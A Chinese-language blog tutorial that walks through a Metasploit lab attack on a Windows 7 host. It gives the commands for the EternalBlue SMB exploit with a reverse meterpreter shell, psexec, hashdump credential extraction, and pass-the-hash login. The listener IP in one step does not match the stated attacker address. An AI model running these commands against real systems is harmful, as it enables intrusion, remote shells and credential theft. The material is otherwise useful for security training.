Metasploit之Hash值傳遞滲透
阿新 • • 發佈:2018-12-10
講述Metasploit獲取到hash值的滲透測試。
測試環境
目標機:
Windows 7 Ultimate
192.168.1.9
攻擊機:
Linux 4.6.0-kali1-amd64
192.168.1.31
攻擊機姿勢(永恆之藍):
msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhost 192.168.1.9 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.12 exploit 獲得shell
Metasploit之Hash值傳遞滲透
進入metasploit環境下進行操作 use exploit/windows/smb/psexec -->使用這個滲透攻擊模組 show options -->檢視配置選項 set RHOST 192.168.1.9 -->設定攻擊目標192.168.1.9 ,埠預設445 set SMBUser tdcoming -->設定賬號為 tdcoming exploit -->執行攻擊 成功後獲得meterpreter的反彈連線 hashdump -->獲取hash值 使用hash值登陸 exit -->從meterpreter的反彈連線中返回到“msf exploit(psexec)>” set smbpass hash值 -->設定hash值 exploit -->再次登陸一遍